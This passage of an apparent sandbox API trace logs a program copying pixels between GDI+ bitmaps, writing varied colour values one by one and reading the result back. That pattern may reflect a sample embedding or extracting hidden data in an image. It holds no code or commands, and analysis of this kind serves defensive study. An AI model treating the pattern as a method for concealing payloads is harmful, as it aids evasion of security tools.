x=162, y=0, color=0x18e3e0) returned 0x0 [0272.968] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.968] GdipBitmapSetPixel (bitmap=0x5d1b670, x=162, y=0, color=0x9a95f89a) returned 0x0 [0272.968] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=163, y=0, color=0x18e3e0) returned 0x0 [0272.968] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.968] GdipBitmapSetPixel (bitmap=0x5d1b670, x=163, y=0, color=0x19d6f8fb) returned 0x0 [0272.968] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=164, y=0, color=0x18e3e0) returned 0x0 [0272.968] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.968] GdipBitmapSetPixel (bitmap=0x5d1b670, x=164, y=0, color=0xf89a96f8) returned 0x0 [0272.968] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=165, y=0, color=0x18e3e0) returned 0x0 [0272.969] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.969] GdipBitmapSetPixel (bitmap=0x5d1b670, x=165, y=0, color=0xf9fbd6f9) returned 0x0 [0272.969] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=166, y=0, color=0x18e3e0) returned 0x0 [0272.969] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.969] GdipBitmapSetPixel (bitmap=0x5d1b670, x=166, y=0, color=0x53174a75) returned 0x0 [0272.969] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=167, y=0, color=0x18e3e0) returned 0x0 [0272.969] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.969] GdipBitmapSetPixel (bitmap=0x5d1b670, x=167, y=0, color=0x3b1f5d1f) returned 0x0 [0272.969] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=168, y=0, color=0x18e3e0) returned 0x0 [0272.969] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.969] GdipBitmapSetPixel (bitmap=0x5d1b670, x=168, y=0, color=0x785d2f3b) returned 0x0 [0272.969] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=169, y=0, color=0x18e3e0) returned 0x0 [0272.969] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.969] GdipBitmapSetPixel (bitmap=0x5d1b670, x=169, y=0, color=0x771a3c19) returned 0x0 [0272.969] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=170, y=0, color=0x18e3e0) returned 0x0 [0272.969] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.969] GdipBitmapSetPixel (bitmap=0x5d1b670, x=170, y=0, color=0x284a7800) returned 0x0 [0272.969] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=171, y=0, color=0x18e3e0) returned 0x0 [0272.969] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.969] GdipBitmapSetPixel (bitmap=0x5d1b670, x=171, y=0, color=0x297b3530) returned 0x0 [0272.970] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=172, y=0, color=0x18e3e0) returned 0x0 [0272.970] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.970] GdipBitmapSetPixel (bitmap=0x5d1b670, x=172, y=0, color=0x77781d75) returned 0x0 [0272.970] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=173, y=0, color=0x18e3e0) returned 0x0 [0272.970] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.970] GdipBitmapSetPixel (bitmap=0x5d1b670, x=173, y=0, color=0x35005f29) returned 0x0 [0272.970] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=174, y=0, color=0x18e3e0) returned 0x0 [0272.970] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.970] GdipBitmapSetPixel (bitmap=0x5d1b670, x=174, y=0, color=0x114e7811) returned 0x0 [0272.970] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=175, y=0, color=0x18e3e0) returned 0x0 [0272.970] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.970] GdipBitmapSetPixel (bitmap=0x5d1b670, x=175, y=0, color=0x480f1919) returned 0x0 [0272.970] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=176, y=0, color=0x18e3e0) returned 0x0 [0272.970] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.970] GdipBitmapSetPixel (bitmap=0x5d1b670, x=176, y=0, color=0x1a3b4008) returned 0x0 [0272.970] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=177, y=0, color=0x18e3e0) returned 0x0 [0272.970] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.970] GdipBitmapSetPixel (bitmap=0x5d1b670, x=177, y=0, color=0x14193916) returned 0x0 [0272.970] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=178, y=0, color=0x18e3e0) returned 0x0 [0272.971] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.971] GdipBitmapSetPixel (bitmap=0x5d1b670, x=178, y=0, color=0x7a301f2d) returned 0x0 [0272.971] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=179, y=0, color=0x18e3e0) returned 0x0 [0272.971] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.971] GdipBitmapSetPixel (bitmap=0x5d1b670, x=179, y=0, color=0x2a347d78) returned 0x0 [0272.971] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=180, y=0, color=0x18e3e0) returned 0x0 [0272.971] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.971] GdipBitmapSetPixel (bitmap=0x5d1b670, x=180, y=0, color=0x78780b0c) returned 0x0 [0272.971] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=181, y=0, color=0x18e3e0) returned 0x0 [0272.971] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.972] GdipBitmapSetPixel (bitmap=0x5d1b670, x=181, y=0, color=0x75173b6e) returned 0x0 [0272.972] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=182, y=0, color=0x18e3e0) returned 0x0 [0272.972] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.972] GdipBitmapSetPixel (bitmap=0x5d1b670, x=182, y=0, color=0x201c722a) returned 0x0 [0272.972] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=183, y=0, color=0x18e3e0) returned 0x0 [0272.973] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.973] GdipBitmapSetPixel (bitmap=0x5d1b670, x=183, y=0, color=0x4e5a7808) returned 0x0 [0272.973] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=184, y=0, color=0x18e3e0) returned 0x0 [0272.973] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.973] GdipBitmapSetPixel (bitmap=0x5d1b670, x=184, y=0, color=0x613c0219) returned 0x0 [0272.973] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=185, y=0, color=0x18e3e0) returned 0x0 [0272.973] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.973] GdipBitmapSetPixel (bitmap=0x5d1b670, x=185, y=0, color=0x1233281a) returned 0x0 [0272.973] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=186, y=0, color=0x18e3e0) returned 0x0 [0272.973] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.973] GdipBitmapSetPixel (bitmap=0x5d1b670, x=186, y=0, color=0x3c493c78) returned 0x0 [0272.973] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=187, y=0, color=0x18e3e0) returned 0x0 [0272.973] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.973] GdipBitmapSetPixel (bitmap=0x5d1b670, x=187, y=0, color=0x1878781a) returned 0x0 [0272.973] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=188, y=0, color=0x18e3e0) returned 0x0 [0272.973] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.973] GdipBitmapSetPixel (bitmap=0x5d1b670, x=188, y=0, color=0x787f1b7a) returned 0x0 [0272.973] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=189, y=0, color=0x18e3e0) returned 0x0 [0272.973] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.973] GdipBitmapSetPixel (bitmap=0x5d1b670, x=189, y=0, color=0x701bc0f8) returned 0x0 [0272.973] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=190, y=0, color=0x18e3e0) returned 0x0 [0272.973] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.973] GdipBitmapSetPixel (bitmap=0x5d1b670, x=190, y=0, color=0x397d7011) returned 0x0 [0272.973] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=191, y=0, color=0x18e3e0) returned 0x0 [0272.973] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.973] GdipBitmapSetPixel (bitmap=0x5d1b670, x=191, y=0, color=0x7979397e) returned 0x0 [0272.973] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=192, y=0, color=0x18e3e0) returned 0x0 [0272.974] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.974] GdipBitmapSetPixel (bitmap=0x5d1b670, x=192, y=0, color=0x69a1f86a) returned 0x0 [0272.974] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=193, y=0, color=0x18e3e0) returned 0x0 [0272.974] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.974] GdipBitmapSetPixel (bitmap=0x5d1b670, x=193, y=0, color=0x1b7a7a1b) returned 0x0 [0272.974] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=194, y=0, color=0x18e3e0) returned 0x0 [0272.974] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.974] GdipBitmapSetPixel (bitmap=0x5d1b670, x=194, y=0, color=0xc196b0d) returned 0x0 [0272.974] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=195, y=0, color=0x18e3e0) returned 0x0 [0272.974] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.974] GdipBitmapSetPixel (bitmap=0x5d1b670, x=195, y=0, color=0xa6d0b11) returned 0x0 [0272.974] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=196, y=0, color=0x18e3e0) returned 0x0 [0272.974] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.974] GdipBitmapSetPixel (bitmap=0x5d1b670, x=196, y=0, color=0x690b5877) returned 0x0 [0272.974] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=197, y=0, color=0x18e3e0) returned 0x0 [0272.974] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.974] GdipBitmapSetPixel (bitmap=0x5d1b670, x=197, y=0, color=0xb0c7c3f) returned 0x0 [0272.974] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=198, y=0, color=0x18e3e0) returned 0x0 [0272.974] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.975] GdipBitmapSetPixel (bitmap=0x5d1b670, x=198, y=0, color=0xd7d581c) returned 0x0 [0272.975] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=199, y=0, color=0x18e3e0) returned 0x0 [0272.975] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.975] GdipBitmapSetPixel (bitmap=0x5d1b670, x=199, y=0, color=0x7717116d) returned 0x0 [0272.975] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=200, y=0, color=0x18e3e0) returned 0x0 [0272.975] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.975] GdipBitmapSetPixel (bitmap=0x5d1b670, x=200, y=0, color=0x4f227320) returned 0x0 [0272.975] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=201, y=0, color=0x18e3e0) returned 0x0 [0272.975] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.975] GdipBitmapSetPixel (bitmap=0x5d1b670, x=201, y=0, color=0x78197ad3) returned 0x0 [0272.975] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=202, y=0, color=0x18e3e0) returned 0x0 [0272.975] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.975] GdipBitmapSetPixel (bitmap=0x5d1b670, x=202, y=0, color=0x1911785d) returned 0x0 [0272.975] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=203, y=0, color=0x18e3e0) returned 0x0 [0272.975] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.975] GdipBitmapSetPixel (bitmap=0x5d1b670, x=203, y=0, color=0xc0d7b11) returned 0x0 [0272.975] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=204, y=0, color=0x18e3e0) returned 0x0 [0272.976] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.976] GdipBitmapSetPixel (bitmap=0x5d1b670, x=204, y=0, color=0x2c601d33) returned 0x0 [0272.976] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=205, y=0, color=0x18e3e0) returned 0x0 [0272.976] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.976] GdipBitmapSetPixel (bitmap=0x5d1b670, x=205, y=0, color=0x1f171e77) returned 0x0 [0272.976] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=206, y=0, color=0x18e3e0) returned 0x0 [0272.976] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.976] GdipBitmapSetPixel (bitmap=0x5d1b670, x=206, y=0, color=0x481a2416) returned 0x0 [0272.976] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=207, y=0, color=0x18e3e0) returned 0x0 [0272.976] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.976] GdipBitmapSetPixel (bitmap=0x5d1b670, x=207, y=0, color=0xc750d3b) returned 0x0 [0272.976] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=208, y=0, color=0x18e3e0) returned 0x0 [0272.976] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.976] GdipBitmapSetPixel (bitmap=0x5d1b670, x=208, y=0, color=0xc1eb2b03) returned 0x0 [0272.976] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=209, y=0, color=0x18e3e0) returned 0x0 [0272.976] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.976] GdipBitmapSetPixel (bitmap=0x5d1b670, x=209, y=0, color=0xdeaab5b6) returned 0x0 [0272.976] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=210, y=0, color=0x18e3e0) returned 0x0 [0272.977] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.977] GdipBitmapSetPixel (bitmap=0x5d1b670, x=210, y=0, color=0xfb637a23) returned 0x0 [0272.977] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=211, y=0, color=0x18e3e0) returned 0x0 [0272.977] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.977] GdipBitmapSetPixel (bitmap=0x5d1b670, x=211, y=0, color=0xf064b92a) returned 0x0 [0272.977] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=212, y=0, color=0x18e3e0) returned 0x0 [0272.977] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.977] GdipBitmapSetPixel (bitmap=0x5d1b670, x=212, y=0, color=0xfca4a7e9) returned 0x0 [0272.977] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=213, y=0, color=0x18e3e0) returned 0x0 [0272.977] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.977] GdipBitmapSetPixel (bitmap=0x5d1b670, x=213, y=0, color=0x36b6aff6) returned 0x0 [0272.977] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=214, y=0, color=0x18e3e0) returned 0x0 [0272.977] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.977] GdipBitmapSetPixel (bitmap=0x5d1b670, x=214, y=0, color=0xad334455) returned 0x0 [0272.977] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=215, y=0, color=0x18e3e0) returned 0x0 [0272.977] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.977] GdipBitmapSetPixel (bitmap=0x5d1b670, x=215, y=0, color=0xb354d63f) returned 0x0 [0272.977] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=216, y=0, color=0x18e3e0) returned 0x0 [0272.977] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.977] GdipBitmapSetPixel (bitmap=0x5d1b670, x=216, y=0, color=0xb33d34b8) returned 0x0 [0272.978] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=217, y=0, color=0x18e3e0) returned 0x0 [0272.978] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.978] GdipBitmapSetPixel (bitmap=0x5d1b670, x=217, y=0, color=0x7fd0b99f) returned 0x0 [0272.978] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=218, y=0, color=0x18e3e0) returned 0x0 [0272.978] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.978] GdipBitmapSetPixel (bitmap=0x5d1b670, x=218, y=0, color=0x29caee76) returned 0x0 [0272.978] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=219, y=0, color=0x18e3e0) returned 0x0 [0272.978] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.978] GdipBitmapSetPixel (bitmap=0x5d1b670, x=219, y=0, color=0xb96bff13) returned 0x0 [0272.978] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=220, y=0, color=0x18e3e0) returned 0x0 [0272.978] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.978] GdipBitmapSetPixel (bitmap=0x5d1b670, x=220, y=0, color=0x3922d0ce) returned 0x0 [0272.978] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=221, y=0, color=0x18e3e0) returned 0x0 [0272.978] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.978] GdipBitmapSetPixel (bitmap=0x5d1b670, x=221, y=0, color=0x4f4f980e) returned 0x0 [0272.978] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=222, y=0, color=0x18e3e0) returned 0x0 [0272.978] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.978] GdipBitmapSetPixel (bitmap=0x5d1b670, x=222, y=0, color=0xae588198) returned 0x0 [0272.978] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=223, y=0, color=0x18e3e0) returned 0x0 [0272.978] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.979] GdipBitmapSetPixel (bitmap=0x5d1b670, x=223, y=0, color=0x2847a9ca) returned 0x0 [0272.979] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=224, y=0, color=0x18e3e0) returned 0x0 [0272.979] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.979] GdipBitmapSetPixel (bitmap=0x5d1b670, x=224, y=0, color=0xe0f21153) returned 0x0 [0272.979] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=225, y=0, color=0x18e3e0) returned 0x0 [0272.979] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.979] GdipBitmapSetPixel (bitmap=0x5d1b670, x=225, y=0, color=0xea82a782) returned 0x0 [0272.979] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=226, y=0, color=0x18e3e0) returned 0x0 [0272.979] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.979] GdipBitmapSetPixel (bitmap=0x5d1b670, x=226, y=0, color=0x8bec49df) returned 0x0 [0272.979] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=227, y=0, color=0x18e3e0) returned 0x0 [0272.979] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.979] GdipBitmapSetPixel (bitmap=0x5d1b670, x=227, y=0, color=0x3f4a96bc) returned 0x0 [0272.979] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=228, y=0, color=0x18e3e0) returned 0x0 [0272.979] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.979] GdipBitmapSetPixel (bitmap=0x5d1b670, x=228, y=0, color=0xff0223f1) returned 0x0 [0272.979] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=229, y=0, color=0x18e3e0) returned 0x0 [0272.979] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.979] GdipBitmapSetPixel (bitmap=0x5d1b670, x=229, y=0, color=0x55daaa17) returned 0x0 [0272.979] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=230, y=0, color=0x18e3e0) returned 0x0 [0272.980] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.980] GdipBitmapSetPixel (bitmap=0x5d1b670, x=230, y=0, color=0x24f91a42) returned 0x0 [0272.980] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=231, y=0, color=0x18e3e0) returned 0x0 [0272.980] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.980] GdipBitmapSetPixel (bitmap=0x5d1b670, x=231, y=0, color=0xe5ca3dcb) returned 0x0 [0272.980] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=232, y=0, color=0x18e3e0) returned 0x0 [0272.980] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.980] GdipBitmapSetPixel (bitmap=0x5d1b670, x=232, y=0, color=0x668599b5) returned 0x0 [0272.980] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=233, y=0, color=0x18e3e0) returned 0x0 [0272.980] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.980] GdipBitmapSetPixel (bitmap=0x5d1b670, x=233, y=0, color=0x2c30fdfb) returned 0x0 [0272.980] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=234, y=0, color=0x18e3e0) returned 0x0 [0272.980] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.980] GdipBitmapSetPixel (bitmap=0x5d1b670, x=234, y=0, color=0x3fb99fc7) returned 0x0 [0272.980] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=235, y=0, color=0x18e3e0) returned 0x0 [0272.980] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.980] GdipBitmapSetPixel (bitmap=0x5d1b670, x=235, y=0, color=0x7ec4ea57) returned 0x0 [0272.980] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=236, y=0, color=0x18e3e0) returned 0x0 [0272.980] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.981] GdipBitmapSetPixel (bitmap=0x5d1b670, x=236, y=0, color=0x2356864e) returned 0x0 [0272.981] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=237, y=0, color=0x18e3e0) returned 0x0 [0272.981] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.981] GdipBitmapSetPixel (bitmap=0x5d1b670, x=237, y=0, color=0x8e397f43) returned 0x0 [0272.981] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=238, y=0, color=0x18e3e0) returned 0x0 [0272.981] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.981] GdipBitmapSetPixel (bitmap=0x5d1b670, x=238, y=0, color=0x9ff5d465) returned 0x0 [0272.981] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=239, y=0, color=0x18e3e0) returned 0x0 [0272.981] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.981] GdipBitmapSetPixel (bitmap=0x5d1b670, x=239, y=0, color=0xd56a5f24) returned 0x0 [0272.981] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=240, y=0, color=0x18e3e0) returned 0x0 [0272.981] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.981] GdipBitmapSetPixel (bitmap=0x5d1b670, x=240, y=0, color=0xe506d78) returned 0x0 [0272.981] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=241, y=0, color=0x18e3e0) returned 0x0 [0272.981] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.981] GdipBitmapSetPixel (bitmap=0x5d1b670, x=241, y=0, color=0xad1a68d) returned 0x0 [0272.981] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=242, y=0, color=0x18e3e0) returned 0x0 [0272.981] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.981] GdipBitmapSetPixel (bitmap=0x5d1b670, x=242, y=0, color=0xe954c369) returned 0x0 [0272.982] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=243, y=0, color=0x18e3e0) returned 0x0 [0272.982] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.982] GdipBitmapSetPixel (bitmap=0x5d1b670, x=243, y=0, color=0x2db4acf2) returned 0x0 [0272.982] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=244, y=0, color=0x18e3e0) returned 0x0 [0272.982] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.982] GdipBitmapSetPixel (bitmap=0x5d1b670, x=244, y=0, color=0x4f16e7b7) returned 0x0 [0272.982] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=245, y=0, color=0x18e3e0) returned 0x0 [0272.982] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.982] GdipBitmapSetPixel (bitmap=0x5d1b670, x=245, y=0, color=0x72dd921c) returned 0x0 [0272.982] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=246, y=0, color=0x18e3e0) returned 0x0 [0272.982] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.982] GdipBitmapSetPixel (bitmap=0x5d1b670, x=246, y=0, color=0xdfcbd104) returned 0x0 [0272.982] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=247, y=0, color=0x18e3e0) returned 0x0 [0272.982] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.982] GdipBitmapSetPixel (bitmap=0x5d1b670, x=247, y=0, color=0x92d61ee7) returned 0x0 [0272.982] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=248, y=0, color=0x18e3e0) returned 0x0 [0272.982] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.982] GdipBitmapSetPixel (bitmap=0x5d1b670, x=248, y=0, color=0xdff86ad3) returned 0x0 [0272.982] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=249, y=0, color=0x18e3e0) returned 0x0 [0272.982] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0273.908] GdipGetImageWidth (image=0x5d1b670, width=0x18e404) returned 0x0 [0273.982] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0273.982] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0273.982] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=0, color=0x18e3d0) returned 0x0 [0274.152] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.152] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.152] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=1, color=0x18e3d0) returned 0x0 [0274.152] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.152] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.152] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=2, color=0x18e3d0) returned 0x0 [0274.152] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.152] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.152] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=3, color=0x18e3d0) returned 0x0 [0274.152] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.152] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.152] 